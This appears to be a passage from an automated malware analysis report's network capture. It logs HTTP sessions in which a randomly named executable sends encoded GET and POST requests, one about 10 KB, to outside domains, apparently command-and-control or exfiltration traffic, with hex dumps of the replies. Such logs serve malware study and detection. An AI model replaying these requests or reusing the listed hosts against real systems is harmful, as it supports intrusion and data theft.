                                                      Jul 3, 2024 17:45:23.721075058 CEST1236INData Raw: 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20
                                                      Data Ascii: "7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stro
                                                      Jul 3, 2024 17:45:23.721092939 CEST224INData Raw: 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 53 6d 61 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36
                                                      Data Ascii: </g> <g id="circlesSmall"> <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle
                                                      Jul 3, 2024 17:45:23.721101999 CEST1236INData Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c
                                                      Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
                                                      Jul 3, 2024 17:45:23.725277901 CEST1236INData Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74
                                                      Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.449754162.0.213.72803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:25.806210041 CEST414OUTGET /nm4d/?lxRlvTSh=P+a6bS4ig9vwqW/Z6ilpMEzKmUBtQAyMrIuXDLnJaK725R5zxskqpas4OYRfTGLo7FbtQu2SDY/2/wEY0mHxpB/VyP4fcE5gLsO9P5KmHmpeamOBXX7CtdE=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.devele.top
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:26.365411043 CEST1236INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:26 GMT
                                                      Server: Apache
                                                      Content-Length: 16026
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                      Jul 3, 2024 17:45:26.365432978 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37
                                                      Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
                                                      Jul 3, 2024 17:45:26.365444899 CEST448INData Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                                      Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
                                                      Jul 3, 2024 17:45:26.365463972 CEST1236INData Raw: 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 35 31 38 2e 30 37 22 20 79 31 3d 22 32 34 35 2e 33 37 35 22 20 78 32 3d 22 35 31 38 2e 30
                                                      Data Ascii: und" stroke-miterlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="5
                                                      Jul 3, 2024 17:45:26.365477085 CEST1236INData Raw: 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78
                                                      Data Ascii: roke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimi
                                                      Jul 3, 2024 17:45:26.365489960 CEST1236INData Raw: 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30
                                                      Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="231.468" y1="291.009" x2="231.468" y2="299.369" /> <l
                                                      Jul 3, 2024 17:45:26.365503073 CEST1236INData Raw: 22 31 38 32 2e 34 34 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                      Data Ascii: "182.44" y2="411.146" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="480.296" y1="406.967" x2="480.296" y
                                                      Jul 3, 2024 17:45:26.365573883 CEST1236INData Raw: 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f
                                                      Data Ascii: <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="200.67" cy="176.313" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap=
                                                      Jul 3, 2024 17:45:26.365586042 CEST1236INData Raw: 30 22 20 63 78 3d 22 34 38 30 2e 32 39 36 22 20 63 79 3d 22 34 37 37 2e 30 31 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20
                                                      Data Ascii: 0" cx="480.296" cy="477.014" r="2.651" /> </g> </g> <g id="spaceman" clip-path="url(cordClip)"> <path id="cord" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round"
                                                      Jul 3, 2024 17:45:26.365597963 CEST1236INData Raw: 65 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c
                                                      Data Ascii: e fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" cx="323.666" cy="235.617" r="6.375" /> </g> <g id="armR"> <
                                                      Jul 3, 2024 17:45:26.370642900 CEST1236INData Raw: 2e 39 31 2c 31 2e 36 32 37 2d 37 2e 34 39 32 2c 32 2e 35 33 36 6c 2d 34 37 2e 39 36 35 2c 32 37 2e 33 30 31 63 2d 36 2e 36 36 34 2c 33 2e 38 32 39 2d 38 2e 39 36 33 2c 31 32 2e 33 33 35 2d 35 2e 31 33 34 2c 31 38 2e 39 39 39 68 30 0a 09 09 09 09
                                                      Data Ascii: .91,1.627-7.492,2.536l-47.965,27.301c-6.664,3.829-8.963,12.335-5.134,18.999h0c3.829,6.664,12.335,8.963,18.999,5.134l9.685-5.564" /> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-line


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.44975523.227.38.74803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:31.767560959 CEST694OUTPOST /k2gj/ HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.valerieomage.com
                                                      Referer: http://www.valerieomage.com/k2gj/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 2f 6b 32 35 43 54 36 63 37 74 38 42 6b 36 66 6a 75 41 2f 6f 4e 70 46 34 43 75 77 4a 44 54 54 30 44 65 61 51 6b 47 33 52 54 77 52 33 2b 64 34 59 46 31 39 6b 33 33 55 70 64 64 41 79 4e 67 6e 5a 39 77 38 30 6d 48 72 53 39 41 5a 74 38 46 57 63 38 79 68 6f 74 50 75 34 44 59 67 55 4a 74 59 75 6c 58 70 5a 4b 43 75 59 6a 45 58 66 4d 6f 2f 38 6d 4b 66 41 66 43 41 57 48 2f 45 44 35 78 2f 4e 44 57 6c 64 46 47 44 2b 69 43 4c 59 72 43 75 4f 33 73 30 79 31 42 30 42 71 38 75 51 72 30 59 4f 43 43 34 59 74 46 4e 61 4e 4c 38 2f 78 55 36 32 76 32 74 7a 79 57 62 4e 64 32 67 74 37 6a 37 6e 43 77 3d 3d
                                                      Data Ascii: lxRlvTSh=/k25CT6c7t8Bk6fjuA/oNpF4CuwJDTT0DeaQkG3RTwR3+d4YF19k33UpddAyNgnZ9w80mHrS9AZt8FWc8yhotPu4DYgUJtYulXpZKCuYjEXfMo/8mKfAfCAWH/ED5x/NDWldFGD+iCLYrCuO3s0y1B0Bq8uQr0YOCC4YtFNaNL8/xU62v2tzyWbNd2gt7j7nCw==
                                                      Jul 3, 2024 17:45:32.391241074 CEST1236INHTTP/1.1 302 Found
                                                      Date: Wed, 03 Jul 2024 15:45:32 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      x-frame-options: DENY
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      content-language: en-US
                                                      x-cache: allow
                                                      location: https://www.valerieomage.com/password
                                                      set-cookie: localization=US; path=/; expires=Thu, 03 Jul 2025 15:45:32 GMT; SameSite=Lax
                                                      x-request-id: 21db27ad-af69-4369-b8ab-1bcdfd9157fb-1720021532
                                                      server-timing: processing;dur=118
                                                      content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=21db27ad-af69-4369-b8ab-1bcdfd9157fb-1720021532
                                                      x-content-type-options: nosniff
                                                      x-download-options: noopen
                                                      x-permitted-cross-domain-policies: none
                                                      x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=21db27ad-af69-4369-b8ab-1bcdfd9157fb-1720021532
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      CF-Cache-Status: DYN
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:32.391258955 CEST466INData Raw: 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73
                                                      Data Ascii: MICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I9KFai8ldlRUmv6dQ54CooaEmU6cktvGPlizEj9BgvDpqtm2%2BHPYAPiFBfCK40gowg%2F40raRO68SQ62PBT74vhq74si7JJoS4UyGz%2FFPtK3sZ5SmD8D9xfCBLHI9Lv60jWDPZQSy"}],"group":"cf-ne
                                                      Jul 3, 2024 17:45:32.392057896 CEST5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.44975623.227.38.74803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:34.299819946 CEST714OUTPOST /k2gj/ HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.valerieomage.com
                                                      Referer: http://www.valerieomage.com/k2gj/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 2f 6b 32 35 43 54 36 63 37 74 38 42 6d 61 50 6a 6f 58 44 6f 59 5a 46 37 65 2b 77 4a 61 44 54 77 44 65 65 51 6b 45 62 2f 51 43 46 33 2f 34 55 59 43 33 56 6b 77 33 55 70 57 39 41 7a 43 41 6e 53 39 77 77 57 6d 47 58 53 39 41 39 74 38 45 6d 63 38 44 68 72 74 66 75 2b 50 34 67 57 48 4e 59 75 6c 58 70 5a 4b 47 2b 79 6a 41 44 66 4d 37 58 38 33 66 7a 66 63 43 42 6b 4e 66 45 44 76 78 2f 4a 44 57 6c 7a 46 44 6a 51 69 41 7a 59 72 47 71 4f 30 39 30 31 6d 68 30 48 75 38 76 42 37 30 35 33 45 78 46 7a 73 56 5a 6a 4f 34 67 54 35 79 72 73 2b 48 4d 6b 67 57 2f 2b 41 78 70 5a 32 67 47 75 5a 79 41 63 66 2b 34 73 39 62 54 50 35 61 56 7a 59 36 4a 5a 7a 47 63 3d
                                                      Data Ascii: lxRlvTSh=/k25CT6c7t8BmaPjoXDoYZF7e+wJaDTwDeeQkEb/QCF3/4UYC3Vkw3UpW9AzCAnS9wwWmGXS9A9t8Emc8Dhrtfu+P4gWHNYulXpZKG+yjADfM7X83fzfcCBkNfEDvx/JDWlzFDjQiAzYrGqO0901mh0Hu8vB7053ExFzsVZjO4gT5yrs+HMkgW/+AxpZ2gGuZyAcf+4s9bTP5aVzY6JZzGc=
                                                      Jul 3, 2024 17:45:34.893969059 CEST1236INHTTP/1.1 302 Found
                                                      Date: Wed, 03 Jul 2024 15:45:34 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      x-frame-options: DENY
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      content-language: en-US
                                                      x-cache: allow
                                                      location: https://www.valerieomage.com/password
                                                      set-cookie: localization=US; path=/; expires=Thu, 03 Jul 2025 15:45:34 GMT; SameSite=Lax
                                                      x-request-id: 429cdd9f-64b5-44bb-aed9-fd6419ea6c8b-1720021534
                                                      server-timing: processing;dur=93
                                                      content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=429cdd9f-64b5-44bb-aed9-fd6419ea6c8b-1720021534
                                                      x-content-type-options: nosniff
                                                      x-download-options: noopen
                                                      x-permitted-cross-domain-policies: none
                                                      x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=429cdd9f-64b5-44bb-aed9-fd6419ea6c8b-1720021534
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      CF-Cache-Status: DYNA
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:34.894133091 CEST465INData Raw: 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d
                                                      Data Ascii: ICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVD1wOxqZPNqCvuCFCxlYy%2FJ2Q7YtwnkWAOH6QPsLl0%2BTo7K7Fc2OT0XEi8OPhpmoH8rwpPkVexuoAOU8cYYIxsmyMkRjHycUDrcBIclHfuRMb4eiMwTGj1SqI7A8hkvIizaB%2BUR"}],"group":"cf-nel
                                                      Jul 3, 2024 17:45:34.896195889 CEST5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.44975723.227.38.74803716C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:45:36.846255064 CEST10796OUTPOST /k2gj/ HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.valerieomage.com
                                                      Referer: http://www.valerieomage.com/k2gj/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 6c 78 52 6c 76 54 53 68 3d 2f 6b 32 35 43 54 36 63 37 74 38 42 6d 61 50 6a 6f 58 44 6f 59 5a 46 37 65 2b 77 4a 61 44 54 77 44 65 65 51 6b 45 62 2f 51 43 39 33 2f 4b 63 59 45 57 56 6b 78 33 55 70 4b 74 41 2b 43 41 6e 4c 39 7a 41 53 6d 47 62 6f 39 47 35 74 2b 6d 75 63 31 58 31 72 6a 66 75 2b 48 59 67 56 4a 74 5a 30 6c 58 34 53 4b 43 69 79 6a 41 44 66 4d 39 72 38 33 4b 66 66 61 43 41 57 48 2f 45 50 35 78 2f 68 44 57 39 46 46 44 76 75 68 78 54 59 71 69 4f 4f 6e 2f 4d 31 6c 42 30 46 70 38 76 5a 37 30 31 57 45 78 4a 56 73 56 74 46 4f 2f 49 54 36 48 71 53 69 55 55 54 33 6c 6a 76 63 57 4e 7a 34 52 2b 39 52 54 49 6a 65 65 46 31 6f 49 50 72 36 70 67 42 62 66 52 6f 6f 57 79 2f 52 6d 44 4c 75 31 79 79 51 6d 35 6c 77 68 65 39 36 5a 50 37 4b 35 53 51 62 56 37 52 75 65 69 41 79 2b 4c 65 58 6b 6e 6f 58 38 46 48 47 41 39 59 69 46 67 4c 71 2b 6e 62 62 68 65 73 62 71 46 65 33 32 76 5a 74 6f 68 76 4d 38 4a 32 36 4b 6c 61 75 53 42 39 49 6e 48 37 4e 44 4e 31 6d 76 75 53 38 7a 4b 71 32 6e 34 38 4e 72 4a 66 4f 4e 69 78 67 [TRUNCATED]
                                                      Data Ascii: lxRlvTSh=/k25CT6c7t8BmaPjoXDoYZF7e+wJaDTwDeeQkEb/QC93/KcYEWVkx3UpKtA+CAnL9zASmGbo9G5t+muc1X1rjfu+HYgVJtZ0lX4SKCiyjADfM9r83KffaCAWH/EP5x/hDW9FFDvuhxTYqiOOn/M1lB0Fp8vZ701WExJVsVtFO/IT6HqSiUUT3ljvcWNz4R+9RTIjeeF1oIPr6pgBbfRooWy/RmDLu1yyQm5lwhe96ZP7K5SQbV7RueiAy+LeXknoX8FHGA9YiFgLq+nbbhesbqFe32vZtohvM8J26KlauSB9InH7NDN1mvuS8zKq2n48NrJfONixgWpL1hr+BtiLjiriBgl8fAnDJbYUGOKq/3kPvHGfU3ahhwmbahwXyvxRqMBJS23UnZW5KVDBXl8fDln7WrTnyJkngFaAbuLhV3zYJqfvMdby2ORlyK70t+FAXBuHoG9sCjkvyGzoSLkZrkpFcgKzWGpH9oQDgCAdON//AEbJVl1YxmJBhO/JGItilxkGXgVfg1wFo0Co5XwJ2Pbi27p79WK3Yqp+iYsArgiTqW7GP1KSEbzdHjHiG/MJIaSGwbrbNtY563EEKX7UkZ7FAtC99wOE5dowa1xx8+F1Q5NfUgASseSn904nVitYtf474vH4JltI4ySrjnyUzovU042blIs6pRS+KcuGPkNog3rT0Z4Qu1/kTOMn3ep36Z6ORsXJWFnf1IqOC6rjMxR7B27S4e+ZRog4VLrNUAMZSyQzMj4Sb1lxz57jFnkY2mYDZJpIwkYB6roAIbZQWUKmd1f2e6MRyKnDfibm7ZI9sb3L3MRt/EB5ZJVDMoNGgfJ1UuMv3nGDZ0G1GqDdUOFs/Rxo9psUm/6HlwsNBH2Ng5wV/IjnmUZkBLG/PHtGGCdyvrllWbP2iOpmpLmP+39Th8WmfDkFpXjFvcDvN2KW/ravd6SWZ5fNnWMtZZIsubHoqS4lYCy/M+yDXPdYoP4khMki/B4HBD31eBHesmw [TRUNCATED]
                                                      Jul 3, 2024 17:45:37.692327023 CEST1236INHTTP/1.1 302 Found
                                                      Date: Wed, 03 Jul 2024 15:45:37 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      x-frame-options: DENY
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      content-language: en-US
                                                      x-cache: allow
                                                      location: https://www.valerieomage.com/password
                                                      set-cookie: localization=US; path=/; expires=Thu, 03 Jul 2025 15:45:37 GMT; SameSite=Lax
                                                      x-request-id: 008bbf82-bb9e-4886-b88e-14197a979f68-1720021537
                                                      server-timing: processing;dur=305
                                                      content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=008bbf82-bb9e-4886-b88e-14197a979f68-1720021537
                                                      x-content-type-options: nosniff
                                                      x-download-options: noopen
                                                      x-permitted-cross-domain-policies: none
                                                      x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=008bbf82-bb9e-4886-b88e-14197a979f68-1720021537
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      CF-Cache-Status: DYN
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:37.692526102 CEST469INData Raw: 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73
